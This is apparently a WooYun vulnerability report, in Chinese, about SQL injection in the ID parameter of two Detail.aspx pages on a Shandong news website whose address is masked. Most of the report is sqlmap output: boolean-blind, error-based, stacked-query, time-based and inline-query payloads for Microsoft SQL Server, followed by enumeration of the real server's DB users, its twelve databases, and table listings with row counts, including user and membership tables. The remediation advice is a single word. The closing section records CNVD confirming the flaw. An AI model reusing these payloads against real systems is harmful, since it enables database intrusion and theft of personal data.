| dbo.ph_HDZhaomuSep                               | 82      |
| dbo.zgm_OldNewImage                              | 81      |
| dbo.TB_ShortCut                                  | 80      |
| dbo.jh_UserInfo                                  | 78      |
| dbo.lz_UserInfo                                  | 73      |
| dbo.zgm_School                                   | 73      |
| dbo.SH_PersonAppend                              | 70      |
| dbo.SH_PersonAppend                              | 70      |
| dbo.NanShan_Apply                                | 66      |
| dbo.tab_webchat_newair                           | 66      |
| dbo.tab_webchat_newair                           | 66      |
| dbo.lz_Photo                                     | 65      |
| dbo.jnsh_Photos                                  | 63      |
| dbo.dl_2015_Award                                | 62      |
| dbo.TC_ColumnType                                | 61      |
| dbo.lcph_ImageGroup                              | 60      |
| dbo.TB_Sites                                     | 52      |
| dbo.qzlx_Question                                | 51      |
| dbo.ent_FilmUser                                 | 50      |
| dbo.ph_Sheyingshi                                | 50      |
| dbo.VoteUsers                                    | 50      |
| dbo.MT_PhotoSpecial                              | 49      |
| dbo.MT_PhotoSpecial                              | 49      |
| dbo.P_V                                          | 43      |
| dbo.ph_GrapherWork                               | 42      |
| dbo.zgm_ZmCompany                                | 41      |
| dbo.njly_Images                                  | 40      |
| dbo.zgm_RecommendZmr                             | 40      |
| dbo.FC_loushiliren                               | 38      |
| dbo.cj2014_Pic                                   | 36      |
| dbo.njly_Baoming                                 | 36      |
| dbo.sdair_Company                                | 32      |
| dbo.lcph_UserInfo                                | 28      |
| dbo.qilu_jiagui                                  | 28      |
| dbo.jnsx_ShuXin                                  | 27      |
| dbo.aspnet_Roles                                 | 26      |
| dbo.hx_BaoMing                                   | 26      |
| dbo.TB_SWRoles                                   | 26      |
| dbo.TC_Nodes                                     | 26      |
| dbo.TC_SysModules                                | 26      |
| dbo.vw_aspnet_Roles                              | 26      |
| dbo.zgm_ZmPerson                                 | 26      |
| dbo.la_BaoMing                                   | 25      |
| dbo.ta_WebZhiBoItem                              | 25      |
| dbo.ta_WebZhiBoItem                              | 25      |
| dbo.fz_jining_ChunwanBaoming                     | 24      |
| dbo.TC_BulletinPosition                          | 24      |
| dbo.cj2014_Question                              | 20      |
| dbo.ph_Grapher                                   | 19      |
| dbo.tb_FriendLinkGroup                           | 17      |
| dbo.tb_FriendLinkGroup                           | 17      |
| dbo.[!FS_NewsClass]                              | 16      |
| dbo.[!FS_NewsClass]                              | 16      |
| dbo.cj2014_AnswerPerson                          | 16      |
| dbo.ph_Activity                                  | 16      |
| dbo.TB_FaceImg                                   | 16      |
| dbo.VoteItem                                     | 16      |
| dbo.dl_Votes                                     | 14      |
| dbo.jnsh_UserInfo                                | 13      |
| dbo.lcph_Votes                                   | 13      |
| dbo.NewAirVote                                   | 13      |
| dbo.ST_PhotoTag                                  | 13      |
| dbo.aq_loveStory                                 | 10      |
| dbo.hs_Votes                                     | 10      |
| dbo.TB_Config                                    | 9       |
| dbo.TB_FriendLinkToGroup                         | 9       |
| dbo.TC_UserEducation                             | 9       |
| dbo.TB_Tables                                    | 8       |
| dbo.f_Activist                                   | 7       |
| dbo.TB_SiteToGroup                               | 7       |
| dbo.TC_DegreeGroup                               | 7       |
| dbo.TC_DegreeGroup                               | 7       |
| dbo.TC_UserDegree                                | 7       |
| dbo.aspnet_SchemaVersions                        | 6       |
| dbo.dz_baoming                                   | 6       |
| dbo.hs_Category                                  | 6       |
| dbo.ph_AwardItem                                 | 6       |
| dbo.ph_AwardItem                                 | 6       |
| dbo.ph_Sybaoming                                 | 6       |
| dbo.hssd_Category                                | 5       |
| dbo.TC_UserRelation                              | 5       |
| dbo.TC_UserStatus                                | 5       |
| dbo.lt_AwardLevel                                | 4       |
| dbo.lt_AwardLevel                                | 4       |
| dbo.TB_SWRolesSpecialColumn                      | 4       |
| dbo.TU_Expert                                    | 4       |
| dbo.ph_Catogry                                   | 3       |
| dbo.TB_Channels                                  | 3       |
| dbo.TB_WorkLog_backup                            | 3       |
| dbo.TB_WorkLog_backup                            | 3       |
| dbo.MT_Application                               | 2       |
| dbo.tb_SitesToExpertsCatogry                     | 2       |
| dbo.TU_UserSpace                                 | 2       |
| dbo.zgm_FromSort                                 | 2       |
| dbo.aspnet_Applications                          | 1       |
| dbo.ent_FilmAction                               | 1       |
| dbo.haier_baoming                                | 1       |
| dbo.MT_PhotoTag                                  | 1       |
| dbo.sdchina_QuestionsCategory                    | 1       |
| dbo.sdchina_QuestionsCategory                    | 1       |
| dbo.TC_AccessChar                                | 1       |
| dbo.TC_AgentType                                 | 1       |
| dbo.ts_DaRenVotes                                | 1       |
| dbo.TU_UserAsk                                   | 1       |
| dbo.TU_UserBBS                                   | 1       |
| dbo.TU_UserDigg                                  | 1       |
| dbo.TU_Volunteer                                 | 1       |
| dbo.vw_aspnet_Applications                       | 1       |
| dbo.xcjy_Clue                                    | 1       |
| dbo.xcjy_News                                    | 1       |
| dbo.zgm_DreamHelpGroup                           | 1       |
+--------------------------------------------------+---------+
Database: SD_QIYE
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.BusinessType                                 | 707     |
| dbo.menus                                        | 15      |
| dbo.ArticleClass_Other                           | 3       |
+--------------------------------------------------+---------+
Database: bbs
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.Sd_myposts                                   | 2011091 |
| dbo.Sd_mytopics                                  | 1365288 |
| dbo.Sd_topics                                    | 1272042 |
| dbo.Sd_posts3                                    | 874100  |
| dbo.Sd_posts1                                    | 759317  |
| dbo.Sd_topictagcaches                            | 328793  |
| dbo.Sd_posts2                                    | 306686  |
| dbo.Sd_moderatormanagelog                        | 82401   |
| dbo.Sd_users                                     | 54030   |
| dbo.Sd_userfields                                | 54027   |
| dbo.Sd_topictags                                 | 25848   |
| dbo.Sd_attachments                               | 19464   |
| dbo.Sd_myattachments                             | 19249   |
| dbo.Sd_pms                                       | 17092   |
| dbo.Sd_tags                                      | 13859   |
| dbo.Sd_adminvisitlog                             | 11450   |
| dbo.Sd_scheduledevents                           | 8806    |
| dbo.Sd_onlinetime                                | 3713    |
| dbo.Sd_statvars                                  | 1836    |
| dbo.Sd_words                                     | 336     |
| dbo.Sd_polloptions                               | 239     |
| dbo.Sd_ratelog                                   | 224     |
| dbo.Sd_moderators                                | 213     |
| dbo.Sd_smilies                                   | 163     |
| dbo.Sd_favorites                                 | 125     |
| dbo.Sd_medals                                    | 99      |
| dbo.Sd_endMaJia                                  | 91      |
| dbo.Sd_topictypes                                | 88      |
| dbo.Sd_stats                                     | 87      |
| dbo.Sd_medalslog                                 | 82      |
| dbo.Sd_endmanager                                | 47      |
| dbo.Sd_polls                                     | 47      |
| dbo.Sd_forumfields                               | 31      |
| dbo.Sd_forums                                    | 31      |
| dbo.Sd_onlinelist                                | 30      |
| dbo.Sd_help                                      | 29      |
| dbo.Sd_usergroups                                | 29      |
| dbo.Sd_forumlinks                                | 26      |
| dbo.Sd_locations                                 | 17      |
| dbo.Sd_topicidentify                             | 17      |
| dbo.Sd_creditslog                                | 14      |
| dbo.Sd_navs                                      | 11      |
| dbo.Sd_postdebatefields                          | 10      |
| dbo.Sd_paymentlog                                | 9       |
| dbo.Sd_bbcodes                                   | 7       |
| dbo.Sd_attachtypes                               | 6       |
| dbo.Sd_advertisements                            | 5       |
| dbo.Sd_debates                                   | 5       |
| dbo.Sd_searchcaches                              | 5       |
| dbo.Sd_admingroups                               | 4       |
| dbo.Sd_tablelist                                 | 3       |
| dbo.Sd_debatediggs                               | 2       |
| dbo.Sd_postid                                    | 2       |
| dbo.Sd_announcements                             | 1       |
| dbo.Sd_attachpaymentlog                          | 1       |
| dbo.Sd_statistics                                | 1       |
| dbo.Sd_templates                                 | 1       |
+--------------------------------------------------+---------+


3.jpg


4.jpg


5.jpg


6.jpg


7.jpg


8.jpg


9.jpg


10.jpg


11.jpg


注入点二:

http://**.**.**.**/special/2010/tour/Detail.aspx?ID=220748&Page=5target=_blank
http://**.**.**.**/special/2010/HighSpeed/Detail.aspx?ID=228609&Page=6


ID存在注入,其余类似专题的页面自己排查吧!~~~
<code>
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 22 HTTP(s) requ
ests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=220748 AND 7555=7555&Page=5target=_blank
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=220748 AND 8874=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(99)+
CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (8874=8874) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113)))&Page=5target=_blank
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: ID=(SELECT CHAR(113)+CHAR(97)+CHAR(99)+CHAR(103)+CHAR(113)+(SELECT
(CASE WHEN (6663=6663) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHA
R(107)+CHAR(107)+CHAR(113))&Page=5target=_blank
---
[19:26:07] [INFO] testing Microsoft SQL Server
[19:26:07] [INFO] confirming Microsoft SQL Server
[19:26:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[19:26:08] [INFO] fetching current user
[19:26:08] [INFO] retrieved: idollar
current user: 'idollar'
[19:26:08] [INFO] fetching current database
[19:26:09] [INFO] retrieved: SDSW20_News
current database: 'SDSW20_News'
[19:26:09] [INFO] testing if current user is DBA
current user is DBA: False
------------------------------------------------------------
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requ
ests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=228609 AND 3840=3840&Page=6
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=228609 AND 8374=CONVERT(INT,(SELECT CHAR(113)+CHAR(108)+CHAR(102
)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (8374=8374) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(119)+CHAR(118)+CHAR(99)+CHAR(113)))&Page=6
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ID=228609; WAITFOR DELAY '0:0:5'--&Page=6
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ID=228609 WAITFOR DELAY '0:0:5'--&Page=6
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: ID=(SELECT CHAR(113)+CHAR(108)+CHAR(102)+CHAR(103)+CHAR(113)+(SELEC
T (CASE WHEN (5568=5568) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+C
HAR(118)+CHAR(99)+CHAR(113))&Page=6
---
[19:59:39] [INFO] testing Microsoft SQL Server
[19:59:39] [INFO] confirming Microsoft SQL Server
[19:59:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[19:59:39] [INFO] fetching current user
[19:59:40] [INFO] retrieved: idollar
current user: 'idollar'
[19:59:40] [INFO] fetching current database
[19:59:40] [INFO] retrieved: SDSW20_News
current database: 'SDSW20_News'
[19:59:40] [INFO] testing if current user is DBA
current user is DBA: False
database management system users [2]:
[*] idollar
[*] sa
available databases [12]:
[*] 91haofang
[*] Man_adv
[*] master
[*] model
[*] msdb
[*] NewsAPP
[*] ReportServer
[*] ReportServerTempDB
[*] SDSW20_Main
[*] SDSW20_News
[*] tempdb
[*] WebFiles
Database: SDSW20_Main
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.TB_SysLog | 103482 |
| dbo.[!FS_News] | 25719 |
| dbo.TU_User | 3734 |
| dbo.TC_Area | 3525 |
| dbo.TE_Agent | 1831 |
| dbo.tb_SiteToFriendLink | 529 |
| dbo.TB_FunCodes | 420 |
| dbo.TB_Columns | 337 |
| dbo.TC_SysFunctions | 240 |
| dbo.TB_FriendLink | 218 |
| dbo.tb_PublishTo | 163 |
| dbo.TU_AdminBBS | 134 |
| dbo.aspnet_UsersInRoles | 131 |
| dbo.vw_aspnet_UsersInRoles | 131 |
| dbo.tab_webchat | 108 |
| dbo.TC_Degree | 99 |
| dbo.TB_ShortCut | 76 |
| dbo.aspnet_Users | 65 |
| dbo.vw_aspnet_Users | 65 |
| dbo.aspnet_Membership | 64 |
| dbo.vw_aspnet_MembershipUsers | 64 |
| dbo.TC_ColumnType | 59 |
| dbo.TU_Admin | 56 |
| dbo.TB_Sites | 29 |
| dbo.TC_Nodes | 26 |
| dbo.TC_SysModules | 26 |
| dbo.aspnet_Roles | 24 |
| dbo.TB_SWRoles | 24 |
| dbo.TC_BulletinPosition | 24 |
| dbo.vw_aspnet_Roles | 24 |
| dbo.[!FS_NewsClass] | 16 |
| dbo.TB_FaceImg | 16 |
| dbo.TB_Config | 9 |
| dbo.TB_FriendLinkToGroup | 9 |
| dbo.TB_Tables | 8 |
| dbo.TB_SiteToGroup | 7 |
| dbo.TB_WorkLog | 7 |
| dbo.TC_DegreeGroup | 7 |
| dbo.TC_UserDegree | 7 |
| dbo.TC_UserEducation | 7 |
| dbo.aspnet_SchemaVersions | 6 |
| dbo.TC_UserRelation | 5 |
| dbo.TC_UserStatus | 5 |
| dbo.TU_Volunteer | 5 |
| dbo.TB_SWRolesSpecialColumn | 4 |
| dbo.TB_Channels | 3 |
| dbo.TB_WorkLog_backup | 3 |
| dbo.tb_SitesToExpertsCatogry | 2 |
| dbo.TU_Expert | 2 |
| dbo.TU_UserSpace | 2 |
| dbo.aspnet_Applications | 1 |
| dbo.TC_AccessChar | 1 |
| dbo.TC_AgentType | 1 |
| dbo.TU_UserAsk | 1 |
| dbo.TU_UserBBS | 1 |
| dbo.TU_UserDigg | 1 |
| dbo.vw_aspnet_Applications | 1 |
+--------------------------------------------------+---------+
Database: SDSW20_News
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.NW_NewsAppend | 3104685 |
| dbo.NW_NewsInfo | 2951443 |
| dbo.vw_NewsInfo | 2892701 |
| dbo.vw_NewsInfo_List | 2892687 |
| dbo.vw_NewsInfoRI | 2892687 |
| dbo.NewsLog | 835816 |
| dbo.Photo_Clicks | 163445 |
| dbo.NW_VotesData | 126723 |
| dbo.gData_News | 109257 |
| dbo.s_OperaLog | 17369 |
| dbo.lh_Reply | 13306 |
| dbo.lh_LivelihoodInfo | 9022 |
| dbo.FS_News | 8147 |
| dbo.NW_SpecialTopic | 7155 |
| dbo.NW_NewsRemarks | 6585 |
| dbo.t_sys_r_GroupMenu | 3495 |
| dbo.t_sys_Menu | 2910 |
| dbo.NW_Sdview | 1855 |
| dbo.vw_SdView | 1844 |
| dbo.vw_SdViewRI | 1844 |
| dbo.TC_NewsCatogry | 1712 |
| dbo.t_sys_r_UserGroup | 1317 |
| dbo.gData_Setting | 1168 |
| dbo.NW_MsInfo | 1020 |
| dbo.TC_NewsCatogry0 | 844 |
| dbo.Photo_Pic

漏洞证明:

见详细说明

修复方案:

过滤?

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-11 17:01

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置.

最新状态:

暂无